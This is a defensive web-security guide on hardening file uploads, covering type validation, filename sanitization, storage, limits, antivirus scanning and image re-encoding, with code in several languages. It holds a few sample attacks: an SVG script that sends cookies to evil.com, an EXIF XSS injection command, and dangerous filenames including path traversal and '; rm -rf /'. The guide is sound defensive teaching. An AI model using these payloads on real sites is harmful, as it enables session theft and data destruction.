jan-karel.com
Home / Security Measures / Web Security / File Upload Hardening

File Upload Hardening

File Upload Hardening

File Upload Hardening

Building Securely Without Delay

Web risk is rarely mysterious. It usually lies in predictable mistakes that persist under time pressure.

In File Upload Hardening you reduce risk with type checking, isolation, scanning, and restricted execution permissions.

This makes security less of a loose afterthought check and more of a standard quality of your product.

Immediate measures (15 minutes)

Why this matters

The core of File Upload Hardening is risk reduction in practice. Technical context supports the choice of measures, but implementation and embedding are central.

Why file uploads are dangerous

An unsecured file upload opens the door to virtually every attack category:

Attack Mechanism Impact
Malware distribution Server is used to host and distribute malware Reputational damage, legal liability
Path traversal Filename contains ../../ to write outside the upload directory Overwriting configuration files, RCE
Denial of Service Extremely large files or enormous numbers of uploads Disk space exhausted, service unavailable
Stored XSS via SVG SVG file with embedded <script> tags Session theft, account takeover
Stored XSS via HTML HTML file with JavaScript, served with text/html Session theft, phishing
EXIF data injection Metadata in images contains payloads XSS, SQL injection via metadata parsing
XML External Entity Files with XML structure (SVG, DOCX, XLSX) contain XXE payloads SSRF, file disclosure
Polyglot files File is simultaneously a valid JPEG and a valid PHP script Bypass of validation, RCE

The key question is not whether your upload functionality is vulnerable, but how many layers of defense you have put in place before an attacker reaches the crown jewels.

File type validation

Extension allowlist

Always use an allowlist of permitted extensions, never a blocklist. A blocklist is by definition incomplete: you block .php but forget .phtml, .pht, .php5, .phar, or .shtml.

# Python - extension allowlist
ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx'}

def allowed_file(filename: str) -> bool:
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS
// Node.js - extension allowlist
const ALLOWED_EXTENSIONS = new Set(['.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx']);

function allowedFile(filename) {
  const ext = path.extname(filename).toLowerCase();
  return ALLOWED_EXTENSIONS.has(ext);
}

MIME type validation

The Content-Type header is set by the client and is therefore fundamentally unreliable. An attacker can upload a PHP webshell with Content-Type: image/jpeg. Verify the MIME type server-side based on the file contents:

# Python - server-side MIME detection with python-magic
import magic

def validate_mime(filepath: str, allowed_mimes: set) -> bool:
    mime = magic.from_file(filepath, mime=True)
    return mime in allowed_mimes

ALLOWED_MIMES = {'image/jpeg', 'image/png', 'image/gif', 'application/pdf'}
// Node.js - MIME detection with file-type (works on magic bytes)
import { fileTypeFromFile } from 'file-type';

async function validateMime(filepath, allowedMimes) {
  const result = await fileTypeFromFile(filepath);
  if (!result) return false;
  return allowedMimes.has(result.mime);
}
// PHP - finfo for MIME detection
function validateMime(string $filepath, array $allowedMimes): bool {
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($filepath);
    return in_array($mime, $allowedMimes, true);
}

Magic bytes validation

Magic bytes (file signatures) are the first bytes of a file that identify the format. This is more reliable than extensions or Content-Type headers, but not watertight: polyglot files can have valid magic bytes and still contain malicious code.

File type Magic bytes (hex) Extension MIME type
JPEG FF D8 FF .jpg, .jpeg image/jpeg
PNG 89 50 4E 47 0D 0A 1A 0A .png image/png
GIF87a 47 49 46 38 37 61 .gif image/gif
GIF89a 47 49 46 38 39 61 .gif image/gif
PDF 25 50 44 46 2D .pdf application/pdf
ZIP (DOCX/XLSX) 50 4B 03 04 .zip, .docx, .xlsx application/zip
RIFF (WebP) 52 49 46 46 .webp image/webp
SVG 3C 3F 78 6D 6C or 3C 73 76 67 .svg image/svg+xml
# Python - magic bytes validation
MAGIC_BYTES = {
    b'\xff\xd8\xff': 'image/jpeg',
    b'\x89PNG\r\n\x1a\n': 'image/png',
    b'GIF87a': 'image/gif',
    b'GIF89a': 'image/gif',
    b'%PDF-': 'application/pdf',
}

def check_magic_bytes(filepath: str) -> str | None:
    with open(filepath, 'rb') as f:
        header = f.read(8)
    for magic, mime in MAGIC_BYTES.items():
        if header.startswith(magic):
            return mime
    return None

Combined validation

Never rely on a single layer. Combine all three methods:

def validate_upload(filename: str, filepath: str) -> bool:
    # Layer 1: extension
    if not allowed_file(filename):
        return False
    # Layer 2: magic bytes
    detected_type = check_magic_bytes(filepath)
    if detected_type not in ALLOWED_MIMES:
        return False
    # Layer 3: server-side MIME
    if not validate_mime(filepath, ALLOWED_MIMES):
        return False
    return True

Filename sanitization

The original filename of an upload is user input and must be treated as such. Never trust it.

Dangerous filenames

Attack technique Example Risk
Path traversal ../../../etc/cron.d/backdoor Overwriting files outside upload dir
Null byte injection shell.php%00.jpg Old parsers see .jpg, server executes .php
Double extension document.php.jpg Depending on server configuration: execution as PHP
Unicode tricks image\u202E\u0067np.php (right-to-left override) Filename appears as imagphp.png in UI
Overlength name A x 10000 + .jpg Buffer overflows, filesystem errors
Special characters ; rm -rf / ;.jpg Command injection with unsafe processing
Windows reserved CON.jpg, NUL.png, AUX.pdf System errors on Windows servers
Dots and spaces shell.php. or shell.php Windows strips trailing dots/spaces: becomes shell.php

Safe approach: renaming

The safest strategy is to completely ignore the original filename and assign a UUID:

import uuid
import os

def safe_filename(original_filename: str) -> str:
    ext = os.path.splitext(original_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"Extension not allowed: {ext}")
    return f"{uuid.uuid4().hex}{ext}"
// Node.js
const { randomUUID } = require('crypto');
const path = require('path');

function safeFilename(originalFilename) {
  const ext = path.extname(originalFilename).toLowerCase();
  if (!ALLOWED_EXTENSIONS.has(ext)) {
    throw new Error(`Extension not allowed: ${ext}`);
  }
  return `${randomUUID().replace(/-/g, '')}${ext}`;
}

If you want to preserve the original name (for example for user-friendliness), store it in the database but use the UUID on the filesystem:

# Database: preserve original name, UUID on disk
upload = Upload(
    original_name=secure_filename(file.filename),
    stored_name=safe_filename(file.filename),
    uploaded_by=current_user.id
)

os.path.basename() is not enough

os.path.basename() prevents path traversal but does not protect against double extensions, null bytes, or Unicode tricks. Use it as an additional layer, not as the sole defense:

# Minimum: basename + Werkzeug secure_filename
from werkzeug.utils import secure_filename

name = secure_filename(os.path.basename(uploaded_name))
# Better: UUID + store original name in database

Storage hardening

Store outside the webroot

Rule number one: never store uploads in a directory that is directly served by the web server. If an attacker uploads a webshell to /var/www/html/uploads/, they can call it directly via the browser.

# Wrong: inside webroot
/var/www/html/
  ├── index.php
  └── uploads/        <-- directly accessible via http://site/uploads/
      └── shell.php   <-- http://site/uploads/shell.php = RCE

# Correct: outside webroot
/var/www/html/
  └── index.php
/srv/uploads/          <-- not directly accessible via HTTP
  └── a3f8b2c1.jpg

Serve uploads via an application route that enforces access control and content-type headers:

# Flask - serve uploads via application
@app.route('/files/<file_id>')
@login_required
def serve_file(file_id):
    upload = Upload.query.get_or_404(file_id)
    return send_from_directory(
        app.config['UPLOAD_FOLDER'],
        upload.stored_name,
        mimetype=upload.detected_mime,  # No text/html!
        as_attachment=True
    )

Dedicated storage service

Preferably use object storage (S3, GCS, Azure Blob) with pre-signed URLs:

# AWS S3 - pre-signed upload URL
import boto3

s3 = boto3.client('s3')

def generate_upload_url(bucket: str, key: str, expires: int = 300) -> str:
    return s3.generate_presigned_url(
        'put_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ContentType': 'image/jpeg',
        },
        ExpiresIn=expires
    )

# Pre-signed download URL
def generate_download_url(bucket: str, key: str, expires: int = 3600) -> str:
    return s3.generate_presigned_url(
        'get_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ResponseContentDisposition': 'attachment',
        },
        ExpiresIn=expires
    )

No execute permissions

Ensure that the upload directory has no execute permissions:

# Filesystem permissions
chmod 750 /srv/uploads
chown www-data:www-data /srv/uploads
# No execute bit on files
chmod 640 /srv/uploads/*

Nginx: block execution in upload directory

# nginx - block script execution in upload location
location /uploads/ {
    # Force download, never execute
    add_header Content-Disposition "attachment" always;
    add_header X-Content-Type-Options "nosniff" always;

    # Explicitly block all script extensions
    location ~* \.(php|phtml|php5|phar|pl|py|cgi|asp|aspx|jsp|sh|bash)$ {
        deny all;
        return 403;
    }

    # No directory listing
    autoindex off;
}

Separate domain for user content

Serve user-generated content from a separate domain to leverage cookie scope and same-origin policy as a defense layer:

# Main application
app.example.com          -> session cookies, CSRF tokens

# User content (separate domain, no cookies from main app)
content.example.com      -> uploads, profile images

If an attacker achieves XSS via an uploaded SVG file on content.example.com, they have no access to cookies from app.example.com.

Size and quantity limits

Without limits, your upload endpoint is an invitation for Denial of Service.

Server configuration

# nginx - maximum body size
http {
    client_max_body_size 10m;    # Global: max 10 MB
    client_body_timeout 30s;     # Timeout for receiving body
    client_body_buffer_size 128k;
}

# Per location override
location /api/upload {
    client_max_body_size 25m;    # Specific endpoint: max 25 MB
}
# Apache
LimitRequestBody 10485760

Application limits

# Flask - file size limit
app.config['MAX_CONTENT_LENGTH'] = 10 * 1024 * 1024  # 10 MB

@app.errorhandler(413)
def too_large(e):
    return jsonify(error="File too large (max 10 MB)"), 413
// Express + multer - file size and quantity limits
const multer = require('multer');

const upload = multer({
  dest: '/srv/uploads/',
  limits: {
    fileSize: 10 * 1024 * 1024,  // 10 MB per file
    files: 5,                     // Max 5 files per request
    fields: 10,                   // Max 10 form fields
  },
  fileFilter: (req, file, cb) => {
    const allowed = ['.jpg', '.jpeg', '.png', '.gif', '.pdf'];
    const ext = path.extname(file.originalname).toLowerCase();
    cb(null, allowed.includes(ext));
  }
});

app.post('/upload', upload.array('files', 5), (req, res) => {
  res.json({ uploaded: req.files.length });
});

Rate limiting

# Flask-Limiter - limit uploads per time unit
from flask_limiter import Limiter

limiter = Limiter(app, key_func=get_remote_address)

@app.route('/upload', methods=['POST'])
@limiter.limit("10/hour")          # Max 10 uploads per hour per IP
@limiter.limit("3/minute")         # Max 3 per minute
def upload_file():
    ...

Antivirus scanning

Scan every uploaded file for malware before it is stored or made available.

ClamAV integration

# Install ClamAV and start daemon
sudo apt install clamav clamav-daemon
sudo freshclam                     # Signature update
sudo systemctl start clamav-daemon
# Python - scanning with pyclamd
import pyclamd

class VirusScanner:
    def __init__(self):
        self.cd = pyclamd.ClamdUnixSocket('/var/run/clamav/clamd.ctl')
        if not self.cd.ping():
            raise RuntimeError("ClamAV daemon not reachable")

    def scan_file(self, filepath: str) -> tuple[bool, str | None]:
        """Returns (is_clean, threat_name)."""
        result = self.cd.scan_file(filepath)
        if result is None:
            return True, None
        # result = {'/path/to/file': ('FOUND', 'Eicar-Test-Signature')}
        status, threat = list(result.values())[0]
        return False, threat

# Usage in upload handler
scanner = VirusScanner()

@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    temp_path = os.path.join('/tmp', safe_filename(file.filename))
    file.save(temp_path)

    is_clean, threat = scanner.scan_file(temp_path)
    if not is_clean:
        os.remove(temp_path)
        app.logger.warning(f"Malware detected: {threat}")
        return jsonify(error="File rejected by virus scanner"), 400

    # File is clean, move to permanent storage
    final_path = os.path.join(app.config['UPLOAD_FOLDER'], os.path.basename(temp_path))
    shutil.move(temp_path, final_path)
    return jsonify(status="ok"), 201

Note: antivirus scanning is an additional layer, not a replacement for file type validation. AV scanners miss zero-day payloads and custom malware.

Image-specific risks

SVG with embedded JavaScript

SVG is XML and can contain arbitrary JavaScript:

<!-- Malicious SVG -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>document.location='https://evil.com/?c='+document.cookie</script>
  <rect width="100" height="100" fill="red"/>
</svg>

Defense: never serve SVG with Content-Type: image/svg+xml if it is user-uploaded content. Use Content-Disposition: attachment or convert to a raster format.

EXIF data with payloads

EXIF metadata in JPEG files can contain XSS payloads or SQL injection strings that are triggered when the application parses metadata and displays it without encoding:

# Payload in EXIF Comment field
exiftool -Comment='<script>alert(document.cookie)</script>' photo.jpg

Image re-encoding as defense

By re-encoding images you remove embedded scripts, EXIF data, and polyglot constructs:

# Python - strip EXIF and re-encode with Pillow
from PIL import Image
import io

def sanitize_image(input_path: str, output_path: str, max_size: tuple = (4096, 4096)):
    """Re-encode image: strips EXIF, removes embedded content."""
    with Image.open(input_path) as img:
        # Verify that it is actually an image
        img.verify()

    # Reopen after verify (verify makes object unusable)
    with Image.open(input_path) as img:
        # Convert to RGB (removes alpha-channel tricks)
        if img.mode not in ('RGB', 'L'):
            img = img.convert('RGB')

        # Limit dimensions
        img.thumbnail(max_size, Image.LANCZOS)

        # Save without EXIF data
        img.save(output_path, format='JPEG', quality=85, exif=b'')
// Node.js - re-encode with sharp
const sharp = require('sharp');

async function sanitizeImage(inputPath, outputPath) {
  await sharp(inputPath)
    .rotate()                    // Auto-rotate based on EXIF, then strip
    .resize(4096, 4096, {
      fit: 'inside',
      withoutEnlargement: true
    })
    .removeAlpha()
    .jpeg({ quality: 85 })
    .toFile(outputPath);
}

Content-Security-Policy for uploads

Add a strict CSP to responses for user-uploaded content:

@app.after_request
def add_upload_csp(response):
    if request.path.startswith('/files/'):
        response.headers['Content-Security-Policy'] = (
            "default-src 'none'; "
            "style-src 'none'; "
            "script-src 'none'; "
            "object-src 'none'"
        )
        response.headers['X-Content-Type-Options'] = 'nosniff'
    return response

It is always a delight to see how applications handle file uploads. "The user can upload a profile photo here," says the product owner, with full confidence that users will obediently pick a 200x200 JPEG. Meanwhile you have just built a direct pipeline from the public internet to your server's filesystem, protected by exactly zero layers of validation and an extension blocklist that contains .exe and .bat but forgot .php. Because yes, who uploads a PHP file as a profile photo? Only everyone who wants to take over your application. But no worries -- the Content-Type header says image/jpeg, so it must be safe. That header is after all set by... the attacker. The same type of logic as a nightclub that asks visitors to write their own age on a note. "He wrote 21, let him through." And to top it all off we store everything nicely in /var/www/html/uploads/, directly accessible and executable via the browser, because that saves us configuring a proxy route. Security by convenience.

Common mistakes

# Mistake Why it is dangerous Solution
1 Extension check only Trivially bypassed by renaming Combine with magic bytes and MIME detection
2 Blocklist instead of allowlist You always forget an extension (.phtml, .phar, .shtml) Use a strict allowlist
3 Trusting the Content-Type header Set by the client, fully manipulable Server-side detection with libmagic/file-type
4 Storage in webroot Direct execution of uploaded script Store outside webroot, serve via application
5 Keeping the original filename Path traversal, double extensions, Unicode tricks UUID renaming, original name in database
6 No size limit DoS through large uploads Configure max on web server and application
7 No rate limiting Brute force upload, disk space exhaustion Limit per IP per time unit
8 Allowing SVG without sanitization Embedded JavaScript, XSS Block SVG or convert to raster
9 Passing EXIF data to frontend XSS via metadata fields Strip EXIF, re-encode images
10 No antivirus scanning Malware distribution via your platform Integrate ClamAV or similar scanner
11 No Content-Disposition header Browser renders file instead of downloading Always attachment for user content
12 Same domain for app and uploads XSS in upload has access to session cookies Use a separate content domain

Checklist

Priority Measure Implementation
CRITICAL Extension allowlist Code: only accept explicitly permitted extensions
CRITICAL Magic bytes validation Code: python-magic, file-type, finfo
CRITICAL Storage outside webroot Infrastructure: separate directory, serve via app route
CRITICAL Filename sanitization Code: UUID renaming, original name in database
HIGH Size limits Web server: client_max_body_size; App: MAX_CONTENT_LENGTH
HIGH Remove execute permissions Infrastructure: chmod, nginx location block
HIGH Content-Disposition header Code/web server: attachment for all user uploads
HIGH X-Content-Type-Options: nosniff Code/web server: prevent MIME sniffing by browser
HIGH Image re-encoding Code: Pillow/sharp for strip EXIF + re-encode
MEDIUM Antivirus scanning Infrastructure: ClamAV daemon + pyclamd integration
MEDIUM Rate limiting Code: Flask-Limiter, express-rate-limit
MEDIUM Separate content domain Infrastructure: content.example.com for user uploads
MEDIUM CSP on upload responses Code: strict Content-Security-Policy header
LOW Pre-signed URLs (S3/GCS) Infrastructure: object storage with temporary URLs
LOW SVG-to-raster conversion Code: Pillow/sharp/Inkscape for SVG sanitization

Summary -- File upload hardening requires a defense-in-depth strategy. No single measure is sufficient on its own: an allowlist on extensions is bypassed by polyglot files, magic bytes validation misses custom payloads, and antivirus scanning does not catch zero-days. The combination of strict file type validation (extension + magic bytes + MIME), filename sanitization (UUID renaming), secure storage (outside webroot, without execute permissions, separate domain), size and rate limits, antivirus scanning, and image re-encoding together form a robust defense. Treat every upload as potentially malicious -- because it is, until proven otherwise.

In the next chapter we cover OAuth 2.0 and OpenID Connect -- how to securely delegate authentication and authorization to identity providers, and which mistakes you absolutely must avoid.

Op de hoogte blijven?

Ontvang maandelijks cybersecurity-inzichten in je inbox.

← Web Security ← Home